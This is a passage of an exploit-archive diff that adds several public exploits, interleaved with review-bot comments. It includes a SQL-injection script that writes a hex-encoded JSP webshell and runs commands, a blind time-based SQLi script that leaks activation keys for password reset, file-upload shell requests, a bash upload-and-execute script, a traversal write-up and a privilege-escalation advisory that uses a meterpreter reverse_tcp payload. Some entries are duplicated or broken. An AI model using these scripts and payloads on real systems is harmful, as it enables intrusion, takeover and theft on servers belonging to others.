Injecting...") + +cmdjsp = "0x3c2540207061676520696d706f72743d226a6176612e7574696c2e2a2c6a6176612" +cmdjsp += "e696f2e2a22253e0a3c250a2f2f0a2f2f204a53505f4b49540a2f2f0a2f2f20636d64" +cmdjsp += "2e6a7370203d20436f6d6d616e6420457865637574696f6e2028756e6978290a2f2f0" +cmdjsp += "a2f2f2062793a20556e6b6e6f776e0a2f2f206d6f6469666965643a2032372f30362f" +cmdjsp += "323030330a2f2f0a253e0a3c48544d4c3e3c424f44593e0a3c464f524d204d4554484" +cmdjsp += "f443d2247455422204e414d453d226d79666f726d2220414354494f4e3d22223e0a3c" +cmdjsp += "494e50555420545950453d227465787422204e414d453d22636d64223e0a3c494e505" +cmdjsp += "55420545950453d227375626d6974222056414c55453d2253656e64223e0a3c2f464f" +cmdjsp += "524d3e0a3c7072653e0a3c250a69662028726571756573742e676574506172616d657" +cmdjsp += "465722822636d64222920213d206e756c6c29207b0a20202020202020206f75742e70" +cmdjsp += "72696e746c6e2822436f6d6d616e643a2022202b20726571756573742e67657450617" +cmdjsp += 
"2616d657465722822636d642229202b20223c42523e22293b0a202020202020202050" +cmdjsp += "726f636573732070203d2052756e74696d652e67657452756e74696d6528292e65786" +cmdjsp += "56328726571756573742e676574506172616d657465722822636d642229293b0a2020" +cmdjsp += "2020202020204f757470757453747265616d206f73203d20702e6765744f757470757" +cmdjsp += "453747265616d28293b0a2020202020202020496e70757453747265616d20696e203d" +cmdjsp += "20702e676574496e70757453747265616d28293b0a202020202020202044617461496" +cmdjsp += "e70757453747265616d20646973203d206e65772044617461496e7075745374726561" +cmdjsp += "6d28696e293b0a2020202020202020537472696e672064697372203d206469732e726" +cmdjsp += "561644c696e6528293b0a20202020202020207768696c652028206469737220213d20" +cmdjsp += "6e756c6c2029207b0a202020202020202020202020202020206f75742e7072696e746" +cmdjsp += "c6e2864697372293b200a2020202020202020202020202020202064697372203d2064" +cmdjsp += "69732e726561644c696e6528293b200a202020202020202020202020202020207d0a2" +cmdjsp += "0202020202020207d0a253e0a3c2f7072653e0a3c2f424f44593e3c2f48544d4c3e0a" +cmdjsp += "0a0a" + +columns = ",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL " +sqlwrite = "INTO DUMPFILE 'C:/CayinApps/webapps/" + filename + "'-- -" +mysqli = constr + cmdjsp + columns + sqlwrite +r = req.get("http://" + ip + urlpath + mysqli, allow_redirects = True) +vremeto.sleep(1) + +print("# Executing...") + +r = req.get("http://" + ip + "/" + filename + "?cmd=whoami") +clean = regularno.compile("
(.*)
", flags = regularno.S).search(r.text) +clean = clean.group(1).replace("
", "\n") +print(clean) +print("You have a webshell @ http://" + ip + "/" + filename) \ No newline at end of file diff --git a/exploits/php/webapps/48542.txt b/exploits/php/webapps/48542.txt new file mode 100644 index 000000000..227ef4629 --- /dev/null +++ b/exploits/php/webapps/48542.txt @@ -0,0 +1,20 @@ +# Exploit Title: Hostel Management System 2.0 - 'id' SQL Injection (Unauthenticated) +# Date: 2020-06-02 +# Exploit Author: Selim Enes 'Enesdex' Karaduman +# Vendor Homepage: https://phpgurukul.com/hostel-management-system/ +# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7210 +# Version: 2.0 +# Tested on: Windows 10 - Wamp Server + +--Vulnerable file /full-profile.php + +--Vulnerable code; + $ret= mysqli_query($con,"SELECT * FROM registration where emailid = '".$_GET['id']."'"); + + Id parameter's value is going into sql query directly! + +--Proof Of Concept + + sqlmap -u "http://TARGET/hostel/full-profile.php?id=6" + OR + http://TARGET/hostel/full-profile.php?id=6' Single Quote will cause SQL error \ No newline at end of file diff --git a/exploits/php/webapps/48544.txt b/exploits/php/webapps/48544.txt new file mode 100644 index 000000000..812ca9acd --- /dev/null +++ b/exploits/php/webapps/48544.txt 
@@ -0,0 +1,62 @@ +# Exploit Title: Clinic Management System 1.0 - Unauthenticated Remote Code Execution +# Google Dork: N/A +# Date: 2020-06-02 +# Exploit Author: BKpatron +# Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip +# Version: v1.0 +# Tested on: Win 10 +# CVE: N/A + +# Vulnerability: +Clinic Management System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution +(RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file. +# vulnerable file : manage_website.php +# Details: +login to website as patient then access the 'localhost/source%20code/manage_website.php' page, as it does not check for an admin user. +change website logo and upload your malicious php file(). if you see this message "Something Went Wrong" You have successfully uploaded the malicious php file. 
+path of your file: http://localhost/source%20code/uploadImage/Logo/your_file.php + +# Proof of Concept: +http://localhost/source%20code/manage_website.php + +POST /source%20code/manage_website.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------135192786613366 +Content-Length: 2539 +Referer: http://localhost/source%20code/manage_website.php +Cookie: PHPSESSID=qdh5f7kelhhe9uvafveafit5e1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +-----------------------------58631544014332: undefined +Content-Disposition: form-data; name="title" + +-----------------------------58631544014332 +Content-Disposition: form-data; name="short_title" + + +-----------------------------58631544014332 +Content-Disposition: form-data; name="footer" + + +-----------------------------58631544014332 +Content-Disposition: form-data; name="currency_code" + + +-----------------------------58631544014332 +Content-Disposition: form-data; name="currency_symbol" + + +-----------------------------58631544014332 +Content-Disposition: form-data; name="old_website_image" + +logo for hospital system.jpg +-----------------------------58631544014332 +Content-Disposition: form-data; name="website_image"; filename="shell.php" +Content-Type: application/octet-stream + + \ No newline at end of file diff --git a/exploits/php/webapps/48545.py b/exploits/php/webapps/48545.py new file mode 100755 index 000000000..71aa847f1 --- /dev/null +++ b/exploits/php/webapps/48545.py 
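Review bot: The title says "Unauthenticated Remote Code Execution", but the Details section starts with "login to website as patient", so this is an upload reachable by any authenticated patient account that skips the admin check, which the title and CSV should say (e.g. `Clinic Management System 1.0 - Authenticated (Patient) Arbitrary File Upload / RCE`). The captured request cannot be replayed as pasted: the `Content-Type` header declares `boundary=---------------------------135192786613366` while every part uses `-----------------------------58631544014332`, and the body stops after the `website_image` part with no file content or closing boundary. Fixing the boundary and adding the closing `-----------------------------58631544014332--` line would make the PoC usable; a sentence on what "Something Went Wrong" indicates (presumably the file was stored before a later step failed) would also help.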
@@ -0,0 +1,34 @@
+# Exploit Title: Navigate CMS 2.8.7 - ''sidx' SQL Injection (Authenticated)
+# Date: 2020-06-04
+# Exploit Author: Gus Ralph
+# Vendor Homepage: https://www.navigatecms.com/en/home
+# Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.8.7r1401.zip/download
+# Version: 2.8.7
+# Tested on: Ubuntu
+# CVE: N/A
+
+# This script will leak the "activation_key" value for the user who's ID is set to 1 in the database.
+# The activation key can be used to reset that user's password to whatever you want, bypassing the need to crack a hash.
+# An example password reset URL would be: `/login.php?action=password-reset&value=[ACTIVATION CODE LEAKED FROM DB]`
+
+import requests, time, string
+
+user = raw_input("Please enter your username: \n")
+password = raw_input("Please enter your password: \n")
+URL = raw_input("Enter the target URL (in this format 'http://domain.com/navigate/'): \n")
+
+s = requests.Session()
+data = {'login-username': (None, user), 'login-password':(None, password)}
+s.post(url = URL + "login.php", files = data)
+dictionary = string.ascii_lowercase + string.ascii_uppercase + string.digits
+final = ""
+while True:
+ for x in dictionary:
+ payload = '(SELECT (CASE WHEN EXISTS(SELECT password FROM nv_users WHERE activation_key REGEXP BINARY "^' + str(final) + x + '.*" AND id = 1) THEN (SELECT sleep(5)) ELSE date_created END)); -- -'
+ r = s.post(url = URL + "/navigate.php?fid=comments&act=1&rows=1&sidx=" + payload)
+ if int(r.elapsed.total_seconds()) > 4:
+ final += x
+ print "Leaking contents of admin hash: " + final
+ break
+ else:
+ pass
\ No newline at end of file
diff --git a/exploits/php/webapps/48546.txt b/exploits/php/webapps/48546.txt
new file mode 100644
index 000000000..1543305fe
--- /dev/null
+++ b/exploits/php/webapps/48546.txt
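Review bot: The script is Python 2 only (`raw_input`, the `print` statement) yet nothing in the header says so; a `# Requires: Python 2, requests` line would make that explicit, and the doubled quote in the title `''sidx'` should be `'sidx'` (the same typo is carried into files_exploits.csv). On the application side the injected value is the `sidx` sort parameter of navigate.php, which from the shape of the payload (`ELSE date_created`) appears to be concatenated into an ORDER BY; a column name cannot be bound as a prepared-statement parameter, so the fix is to map `sidx` against an allowlist of permitted column names before it reaches SQL. For detection, the technique is time-based (`sleep(5)` per correct guess), so bursts of POSTs to `navigate.php?fid=comments` whose `sidx` contains `SELECT` and whose response times cluster near 5 s stand out in access logs. Because the leaked value is `activation_key`, expiring activation keys after use and rate-limiting `login.php?action=password-reset` limit the impact of a successful extraction.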
@@ -0,0 +1,76 @@
+# Exploit Title: Oriol Espinal CMS 1.0 - 'id' SQL Injection
+# Google Dork: inurl:/eotools_share/
+# Date: 2020-06-03
+# Exploit Author: TSAR
+# Vendor Homepage: http://www.oriolespinal.es/eowd
+# Software Link: http://www.oriolespinal.es/eotools
+# Version: ALL VERSION UP TO LATEST
+# Tested on: MACOS 10.11.2
+# CVE : NOt YET
+
+[1]########### SQl INJECTION ###########
+
+Oriol Espinal CMS is brone to a remote sql injection vulnerability, the next exploit is applicable
+
+http://victim.com/path/eotools_share/editar.php?id=-1%20/*!50000union*/%20/*!50000all*/%20/*!50000select*/%201,2,3,4,5,6,7,8,9,10--
+
+
+[2]########### SQl INJECTION ###########
+
+
+
+
+Oriol Espinal CMS is brone to a file upload vulnerability, the next exploit [using Burp Suite] is applicable:
+
+
+POST /path/eotools_cms/app_gestor_archivos/upload2_iframe.php HTTP/1.1
+Host: victim.com
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://victim.com/path/eotools_cms/app_gestor_archivos/upload1_iframe.php
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------165073870416097602871919119556
+Content-Length: 740
+Connection: close
+Cookie: PHPSESSID=e159f6c9e8a818251a4ff48d47ab3df3; acopendivids=cortina2; acgroupswithpersist=nada
+
+-----------------------------165073870416097602871919119556
+Content-Disposition: form-data; name="userfile"; filename="shell.php"
+Content-Type: image/png
+
+PNG;
+********************************/
+********************************/
+GIF89a;
+********************/
+********************/
+-----------------------------165073870416097602871919119556
+Content-Disposition: form-data; name="categoria"
+
+pdfs
+-----------------------------165073870416097602871919119556
+Content-Disposition: form-data; name="descripcion"
+
+123
+-----------------------------165073870416097602871919119556
+Content-Disposition: form-data; name="submit"
+
+upload
+-----------------------------165073870416097602871919119556--
+
+
+the shell path is:
+
+http://victim.com/path/eotools_files/files/shell.php
+
+
+==========================================================
+
+==========================================================
+
+Greetz To : @zigo0o - Alnjm33 - ShoOt3r - red virus - pRedAtOr - Elkatrez Elmodamer - Egy-sn!p3r
+ [ALL MUSLIM AND ARAB HACKERS]
+
+==========================================================
\ No newline at end of file
diff --git a/exploits/php/webapps/48547.txt b/exploits/php/webapps/48547.txt
new file mode 100644
index 000000000..18d079f01
--- /dev/null
+++ b/exploits/php/webapps/48547.txt
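Review bot: The second section header `[2]########### SQl INJECTION ###########` is mislabeled: the text under it describes a file upload through app_gestor_archivos/upload2_iframe.php, not a SQL injection, and since the files_exploits.csv entry only names the 'id' SQL injection, the upload issue is effectively invisible in the index; the header should read `[2]########### FILE UPLOAD ###########` and the title should mention both. `# Version: ALL VERSION UP TO LATEST` and `# CVE : NOt YET` give a maintainer nothing to pin a fix to; the version actually tested (or at least the download date) belongs there, and "brone" in both paragraphs should be "prone". On the fix side, editar.php should cast `id` to an integer or bind it as a prepared-statement parameter, and the upload handler should decide by a server-side extension and content allowlist rather than the client-supplied `Content-Type: image/png`, with eotools_files/files/ served without script execution; a `.php` file appearing in that directory is the detection signal.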
@@ -0,0 +1,62 @@
+# Exploit Title: Clinic Management System 1.0 - Authenticated Arbitrary File Upload
+# Google Dork: N/A
+# Date: 2020-06-02
+# Exploit Author: BKpatron
+# Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip
+# Version: v1.0
+# Tested on: Win 10
+# CVE: N/A
+
+# Vulnerability:
+Clinic Management System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution
+(RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file.
+# vulnerable file : manage_website.php
+# Details:
+login to website as patient then access the 'localhost/source%20code/manage_website.php' page, as it does not check for an admin user.
+change website logo and upload your malicious php file(). if you see this message "Something Went Wrong" You have successfully uploaded the malicious php file.
+path of your file: http://localhost/source%20code/uploadImage/Logo/your_file.php
+
+# Proof of Concept:
+http://localhost/source%20code/manage_website.php
+
+POST /source%20code/manage_website.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------135192786613366
+Content-Length: 2539
+Referer: http://localhost/source%20code/manage_website.php
+Cookie: PHPSESSID=qdh5f7kelhhe9uvafveafit5e1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+-----------------------------58631544014332: undefined
+Content-Disposition: form-data; name="title"
+
+-----------------------------58631544014332
+Content-Disposition: form-data; name="short_title"
+
+
+-----------------------------58631544014332
+Content-Disposition: form-data; name="footer"
+
+
+-----------------------------58631544014332
+Content-Disposition: form-data; name="currency_code"
+
+
+-----------------------------58631544014332
+Content-Disposition: form-data; name="currency_symbol"
+
+
+-----------------------------58631544014332
+Content-Disposition: form-data; name="old_website_image"
+
+logo for hospital system.jpg
+-----------------------------58631544014332
+Content-Disposition: form-data; name="website_image"; filename="shell.php"
+Content-Type: application/octet-stream
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/48548.txt b/exploits/php/webapps/48548.txt
new file mode 100644
index 000000000..96e1c1205
--- /dev/null
+++ b/exploits/php/webapps/48548.txt
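Review bot: This file is a byte-for-byte copy of 48544.txt above, header, date, cookie and multipart body included; only the title differs, and the body still says "Unauthenticated File Upload Vulnerability" under an "Authenticated Arbitrary File Upload" title. Of the two titles this one matches the steps described (log in as patient, then use manage_website.php), so either 48544.txt should be withdrawn or this entry trimmed to the authenticated variant with its `# Vulnerability:` paragraph reworded, e.g. `Clinic Management System version 1.0 lacks an authorization check on manage_website.php, so any authenticated patient can replace the site logo with an arbitrary file.` Publishing the same PoC twice under contradictory labels makes the index harder to act on for anyone triaging the product.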
@@ -0,0 +1,99 @@
+# Exploit Title: Navigate CMS 2.8.7 - Cross-Site Request Forgery (Add Admin)
+# Date: 2020-06-04
+# Exploit Author: Gus Ralph
+# Vendor Homepage: https://www.navigatecms.com/en/home
+# Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.8.7r1401.zip/download
+# Version: 2.8.7
+# Tested on: Ubuntu
+# CVE:
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/48550.txt b/exploits/php/webapps/48550.txt
new file mode 100644
index 000000000..243053d2c
--- /dev/null
+++ b/exploits/php/webapps/48550.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Navigate CMS 2.8.7 - Authenticated Directory Traversal
+# Date: 2020-06-04
+# Exploit Author: Gus Ralph
+# Vendor Homepage: https://www.navigatecms.com/en/home
+# Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.8.7r1401.zip/download
+# Version: 2.8.7
+# Tested on: Ubuntu
+# CVE: CVE-2020-13795
+
+A malicious user can abuse the authenticated templates functionality to traverse out of the templates directory to read and write to any file on the webserver as www-data.
+
+For this vulnerability, I looked into the "templates" feature of the application. It seems we can edit any file in the application's templates directory, for example:
+ `/var/www/html/navigate/private/1/templates/`
+
+My initial thought was to traverse out of the current directory and read the global config file (located at `/var/www/html/navigate/cfg/globals.php`).
+
+My payload would then consist of creating a template, setting the path to be `/var/www/html/navigate/private/1/templates/../../../cfg/globals.php`
+
+Furthermore, this can be abused to write to a PHP file and gain RCE on the remote server, for example:
+
+Traversal payload:
+`../../../navigate.php`
+
+PHP Code execution payload:
+```
+
+```
\ No newline at end of file
diff --git a/exploits/php/webapps/48552.sh b/exploits/php/webapps/48552.sh
new file mode 100755
index 000000000..1097eaa66
--- /dev/null
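Review bot: The 48548.txt hunk declares 99 added lines but only the eight header lines and four blank lines are visible here, so the CSRF proof (presumably an HTML form) appears to have been stripped in this rendering, and the `# CVE:` field is left empty while the sibling 48550.txt for the same release carries CVE-2020-13795. A defender reading this entry gets no reproducible detail at all, so either the body should be restored or the header should at least name the vulnerable endpoint and state the missing control, e.g. `# Root cause: the admin user-creation form carries no per-session anti-CSRF token`.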
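Review bot: 48550.txt names the templates path and the `../../../cfg/globals.php` and `../../../navigate.php` targets but never states the missing check, which is what a maintainer needs: the template path should be canonicalised (realpath) and rejected unless it resolves under `private/1/templates/` before any read or write happens. The `PHP Code execution payload:` fenced block at the end is empty in this rendering, so the RCE claim in the preceding sentence is unsupported as shown and should either be filled in or reworded as "write access to PHP files under the web root". On the detection side, a modification of navigate.php or cfg/globals.php by the www-data user outside a deployment window is the file-integrity signal to alert on.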
+++ b/exploits/php/webapps/48552.sh 
@@ -0,0 +1,52 @@
+# Exploit Title: Online Marriage Registration System 1.0 Remote Code Execution
+# Google Dork: N/A
+# Date: 2020-05-31
+# Exploit Author: Selim Enes 'Enesdex' Karaduman
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
+# Version: 1.0
+# Tested on: Windows 10 / Xampp Server and Wamp Server
+# CVE : N/A
+# Notes : Exploit Requires Authentication But You Can Register As User For Free, This Is Enough To Exploit System
+
+#!/bin/bash
+echo "# Online Marriage Registration System 1.0 ---> Remote Code Execution"
+echo "# Author ---> Selim Enes Karaduman"
+echo "# Usage ---> ./exploit.sh -u TARGET_URL(e.g http://10.10.10.10/omrs/ -m MOBILE_NUMBER -p PASSWORD -c COMMAND"
+while getopts u:m:p:c: par
+do
+case $par in
+u) url=$OPTARG ;;
+m) mnum=$OPTARG ;;
+p) passwd=$OPTARG ;;
+c) command=$OPTARG ;;
+esac
+done
+sess=$(curl -s -i -X POST $url/user/login.php -d "mobno=$mnum&password=$passwd&login=" | grep -F "Set-Cookie" | sed 's/;//g' | cut -d " " -f 2)
+url_for_req=$(echo $url | cut -d "/" -f 3)
+function upload(){
+curl -i -s -k -X $'POST' \
+ -H $"Host: $url_for_req" -H $'Content-Type: multipart/form-data; boundary=---------------------------8759967759481129101498329242' -H $"Cookie: $sess" -H $'Content-Length: 3244' \
+ -b $"$sess" \
+ --data-binary $'-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"dom\"\x0d\x0a\x0d\x0a05/01/2020\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"nofhusband\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"husimage\"; filename=\"a.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0a\x0a\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; 
name=\"hreligion\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hdob\"\x0d\x0a\x0d\x0a05/01/2020\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hsbmarriage\"\x0d\x0a\x0d\x0aBachelor\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"haddress\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hzipcode\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hstate\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hadharno\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"nofwife\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wifeimage\"; filename=\"test.jpg\"\x0d\x0aContent-Type: image/jpeg\x0d\x0a\x0d\x0ahi\x0a\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wreligion\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wdob\"\x0d\x0a\x0d\x0a05/01/2020\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wsbmarriage\"\x0d\x0a\x0d\x0aBachelor\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddress\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; 
name=\"wzipcode\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wstate\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wadharno\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"witnessnamef\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddressfirst\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"witnessnames\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddresssec\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"witnessnamet\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddressthird\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"submit\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------8759967759481129101498329242--\x0d\x0a' \
+ $"$url/user/marriage-reg-form.php" >>/dev/null
+}
+upload
+
+#Execute the given command
+shell_file=$(curl -s $url/user/images/ | grep ".php" | grep -Eo 'href="[^\"]+"' | sed 's/href=//g' | sed 's/\"//g' | grep -m1 '')
+
+
+check=$(echo $command | grep " " | wc -l)
+if [[ $check > 0 ]]
+then
+fixed_command=$(echo $command | sed 's/ /%20/g')
+curl -s "$url/user/images/$shell_file?cmd=$fixed_command"
+else
+curl -s "$url/user/images/$shell_file?cmd=$command"
+fi
+
+
+echo "IF YOU DONT GET RESPONSE OF THE COMMAND YOU GAVE, PROBABLY YOU GAVE WRONG CREDENTIALS"
+echo "After first 
exploit, even if you give wrong credentials it'll work since the file is already uploaded"
+shift $((OPTIND-1))
\ No newline at end of file
diff --git a/exploits/windows/local/48543.txt b/exploits/windows/local/48543.txt
new file mode 100644
index 000000000..3972d1db3
--- /dev/null
+++ b/exploits/windows/local/48543.txt
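Review bot: The `#!/bin/bash` line sits twelfth in the file, below the header comments, where it is an ordinary comment rather than a shebang, and `# Tested on: Windows 10 / Xampp Server and Wamp Server` describes the target while the script itself depends on bash, curl, grep and sed; a `# Requires: bash, curl, grep, sed` line in the header would make that explicit. `[[ $check > 0 ]]` is a string comparison rather than a numeric one, and `shift $((OPTIND-1))` on the last line has no effect there, both reading as leftovers. From the defender's side, the upload is a multipart POST to `user/marriage-reg-form.php` whose `husimage` part carries `filename="a.php"` with `Content-Type: application/x-php`, after which the script requests `user/images/<name>.php?cmd=...`; any `.php` file landing in user/images/, or a request to that directory with a `cmd` query string, is the signature to alert on, and the fix is a server-side extension and content allowlist for the image fields plus disabling script execution in user/images/.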
@@ -0,0 +1,53 @@
+# Title: IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path
+# Author: Gobinathan L
+# Date: 2020-06-03
+# Vendor Homepage: https://www.iobit.com
+# Software Link: https://www.iobit.com/en/advanceduninstaller.php
+# Version : 9.5.0.15
+# Tested on: Windows 10 64bit(EN)
+
+About Unquoted Service Path :
+==============================
+
+When a service is created whose executable path contains spaces and isn't enclosed within quotes,
+leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges.
+(only if the vulnerable service is running with SYSTEM privilege level which most of the time it is).
+
+Steps to recreate :
+=============================
+
+1. Open CMD and Check for USP vulnerability by typing [ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ]
+2. The Vulnerable Service would Show up.
+3. Check the Service Permissions by typing [ sc qc IObitUnSvr ]
+4. The command would return..
+
+ C:\>sc qc IObitUnSvr
+ [SC] QueryServiceConfig SUCCESS
+ SERVICE_NAME: IObitUnSvr
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 0 IGNORE
+ BINARY_PATH_NAME : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : IObit Uninstaller Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+5. This concludes that the service is running as SYSTEM. "Highest privilege in a machine"
+6. Now create a Payload with msfvenom or other tools and name it to IObit.exe
+7. Make sure you have write Permissions to "C:\Program Files (x86)\IObit" directory.
+8. Provided that you have right permissions, Drop the IObit.exe executable you created into the "C:\Program Files (x86)\IObit" Directory.
+9. Now restart the IObit Uninstaller service by giving coommand [ sc stop IObitUnSvr ] followed by [ sc start IObitUnSvr ]
+10. 
If your payload is created with msfvenom, quickly migrate to a different process. [Any process since you have the SYSTEM Privilege].
+
+During my testing :
+
+Payload : msfvenom -p windows/meterpreter/reverse_tcp -f exe -o IObit.exe
+Migrate : meterpreter> run post/windows/manage/migrate [To migrate into a different Process ]
+
+# Disclaimer :
+=========================
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
+The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index a73d057de..ca945761d 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11084,6 +11084,7 @@ id,file,description,date,author,type,platform,port
 48507,exploits/windows/local/48507.py,"VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP_ASLR)",2020-05-22,Gobinathan,local,windows,
 48510,exploits/windows/local/48510.py,"GoldWave - Buffer Overflow (SEH Unicode)",2020-05-25,"Andy Bowden",local,windows,
 48517,exploits/windows/local/48517.py,"StreamRipper32 2.6 - Buffer Overflow (PoC)",2020-05-26,"Andy Bowden",local,windows,
+48543,exploits/windows/local/48543.txt,"IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path",2020-06-04,Gobinathan,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
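Review bot: Step 7 ("Make sure you have write Permissions to "C:\Program Files (x86)\IObit" directory") is the whole precondition of this advisory, yet it never states whether the installer actually grants that permission to standard users; by default Program Files (x86) is writable only by administrators, in which case the unquoted path yields no privilege gain, so the write-up should include the observed ACL of that directory (for example `icacls` output) to support the SYSTEM claim. The `wmic ... | findstr /i /v """` filter in step 1 appears to have lost its quoting in the paste, which matters because it is the command a defender would reuse to audit other services. The remediation is simply quoting `BINARY_PATH_NAME` for IObitUnSvr (vendor or administrator side), and the detection signal is a new `IObit.exe` appearing under `C:\Program Files (x86)\IObit` followed by a stop/start of IObitUnSvr. The enclosing hunk is followed by the files_exploits.csv index change, which needs no review.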
@@ -42768,3 +42769,19 @@ id,file,description,date,author,type,platform,port
 48536,exploits/php/webapps/48536.py,"QuickBox Pro 2.1.8 - Authenticated Remote Code Execution",2020-06-01,s1gh,webapps,php,
 48538,exploits/php/webapps/48538.txt,"Clinic Management System 1.0 - Authentication Bypass",2020-06-02,BKpatron,webapps,php,
